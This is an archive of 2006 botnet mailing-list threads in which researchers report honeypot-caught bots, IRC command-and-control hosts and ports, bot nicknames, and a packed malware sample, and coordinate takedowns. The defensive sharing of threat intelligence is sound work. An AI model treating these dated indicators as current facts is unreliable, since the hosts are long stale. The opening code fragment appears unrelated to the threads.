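    for target, hits in targets_to_notify(extract_incidents(SAMPLE_LOG)).items():
        print(target, hits)
```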
Re: [botnets] botnet reporting
Kyle Lutze wrote:

a new botnet reporting system has been setup at shadowserver. for all interested, http://www.shadowserver.org/botnet/main_page.php there are currently ~30 botnets in the database, and it's only been up for a few days.

Naturally, everyone is welcome to start their own systems. If it means anything to anyone, I personally trust the people at Shadowserver. I am not aware of how they report the information, but I am sure they will come up with something.

Gadi.
Re: [botnets] AOL AIM bots
scot wrote:

On Tuesday 21 March 2006 21:06, scot wrote:

Please disregard the email address in my previous post. I can only assume he pasted me the wrong email address; I'll try to catch up with him and have a correction made. Sorry for any inconvenience this might have caused.

[EMAIL PROTECTED]

My infamous FD email address. No prob. :)
Re: [botnets] AOL AIM bots
scot wrote:

On Wednesday 22 March 2006 03:30, scot wrote:

Apologies again for the confusion. This is the proper email address to send to if you have any information regarding AOL Aim client bots: [EMAIL PROTECTED]

So who is this guy and why are we sending him information?
Re: [botnets] Skype - the next vector?
John Draper wrote:

Jose Nazario wrote:

On Thu, 16 Mar 2006, Gadi Evron wrote:

http://www.blackhat.com/presentations/bh-europe-06/bh-eu-06-biondi/bh-eu-06-biondi-$

This URL is an incomplete URL - Could you please re-post this URL. I really would like to check this presentation out.

Press the right arrow key. ;) Tell me if that works.

Damn wrapping. Always gets me too.
Re: [botnets] darkdreamz isocore
Brian Allen wrote:

A google search on these two hostnames, irc.darkdreamz.com and irc.isocore.biz, only turned up a few hits, but they seemed to be related to filesharing. How can I tell if this is a few students trying to get music, games, etc. or if these are bots connecting to a C&C?

Any such hit may often be a legitimate IRC server, or a very shaky one, still used for chat. In this case:

    NICK [Niger]-029
    NICK [Niger]-015
    NICK [Niger]-017
    NICK [N]-487

My bet would be on a botnet, whether full-fledged or for xdcc. If you want to be sure, one way is to see what else sits on those channels.
[botnets] Skype - the next vector?
Ami (and me) just wrote about it:
http://blogs.securiteam.com/index.php/archives/355

But if you have the time, I'd STRONGLY suggest you go straight to the amazing work at the source:
http://www.blackhat.com/presentations/bh-europe-06/bh-eu-06-biondi/bh-eu-06-biondi-$

Gadi.
Re: [botnets] Modified upx?
On Wed, 15 Mar 2006, Tron wrote:

I have a file, rp5.exe, snared by my running instance of nepenthes, which is quite obviously compressed via UPX...

    upx -l rp5.exe
                           Ultimate Packer for eXecutables
                              Copyright (C) 1996,1997,1998,1999,2000,2001,2002,2003,2004,2005,2006
    UPX 1.94 beta       Markus Oberhumer, Laszlo Molnar & John Reiser   Mar 11th 2006

            File size         Ratio      Format      Name
       --------------------   ------   -----------   -----------
        152064 ->     61952   40.74%    win32/pe     rp5.exe

... but which I can't decompress...

    upx: rp5.exe: Exception: checksum error.

Which is obviously why Norman sandbox stated, for this particular binary..

    nepenthes-9291587b85191b06bbf80d4ea1fb142e-rp5.exe : Not detected by sandbox (Signature: NO_VIRUS).

Presumably, this means that whoever compressed this binary used an altered version of upx?

I am not sure what the case is here, but many different variants of UPX are out there. You need to trace it and find the real entry point.

Gadi.

See Norman Sandbox reference 20060315-665 for the full (and unhelpful) report.

Regards.
Re: [botnets] Modified upx?
M45T3R S4D0W8 wrote:

On 3/15/06, Tron [EMAIL PROTECTED] wrote:

I have a file, rp5.exe, snared by my running instance of nepenthes, which is quite obviously compressed via UPX...

    upx -l rp5.exe
                           Ultimate Packer for eXecutables
                              Copyright (C) 1996,1997,1998,1999,2000,2001,2002,2003,2004,2005,2006
    UPX 1.94 beta       Markus Oberhumer, Laszlo Molnar & John Reiser   Mar 11th 2006

            File size         Ratio      Format      Name
       --------------------   ------   -----------   -----------
        152064 ->     61952   40.74%    win32/pe     rp5.exe

... but which I can't decompress...

    upx: rp5.exe: Exception: checksum error.

Which is obviously why Norman sandbox stated, for this particular binary..

    nepenthes-9291587b85191b06bbf80d4ea1fb142e-rp5.exe : Not detected by sandbox (Signature: NO_VIRUS).

Presumably, this means that whoever compressed this binary used an altered version of upx?

See Norman Sandbox reference 20060315-665 for the full (and unhelpful) report.

Regards.

There are various Utilities for making it impossible to Unpack a UPXed EXE.

Nothing is impossible. Not trying to be annoying.. just is. You can make it as close to impossible as possible. :) (now I am being annoying) which is the point behind software protection. Make it difficult *enough*, and you achieved your goal. If it sits on your computer, you will eventually break it.

Be careful about saying never, ever, impossible, all, none, 100%, etc. I always fall on these as I often mean most, almost all, etc.
Re: [botnets] botnet in japan...
Lindsey Chesnutt wrote:

I caught a bot with nepenthes this morning. Norman says that it connected to this address - o2.zener.co.jp on port 4997 (TCP). There are about 25 active bots in the channel #satan2, all with IP addresses encrypted. It is an rxbot.

Thanks - being followed-up on. :)

Gadi.
Re: [botnets] web remote include path
bodik wrote:

hi, this list seems to be for white Jedi ;) so I'll add my contribution. Even with low experience I believe I found a botnet through a snort report about WEB remote include path:

Any contribution is welcome. We are looking into it, thanks!
Re: [botnets] found a botnet
Jay Lists wrote:

Hello, I just joined this list because I have found a botnet. It might already be known but I figured I would report it anyway. I have found the irc server they are connecting to and there are currently a little over 300 bots on the channel. Not sure how much info I should post here, so please let me know.

Thanks,
Jay

As much as you feel comfortable with. You can always use the private address for more. :)

Thanks!
Gadi.
Re: [botnets] tracking a botnet for some time now...
[EMAIL PROTECTED] wrote:

hi, I've been following this moron bot owner around for a while. The guy appears to be using them to load spyware. I'm having trouble getting one of his last ircds shut off.. anyone with any connections at theplanet.com? Their abuse@ is useless.

Yes, please contact us offline. The Planet are very responsive to botnet reports.

Gadi.

--
http://blogs.securiteam.com/
Out of the box is where I live. -- Cara Starbuck Thrace, Battlestar Galactica.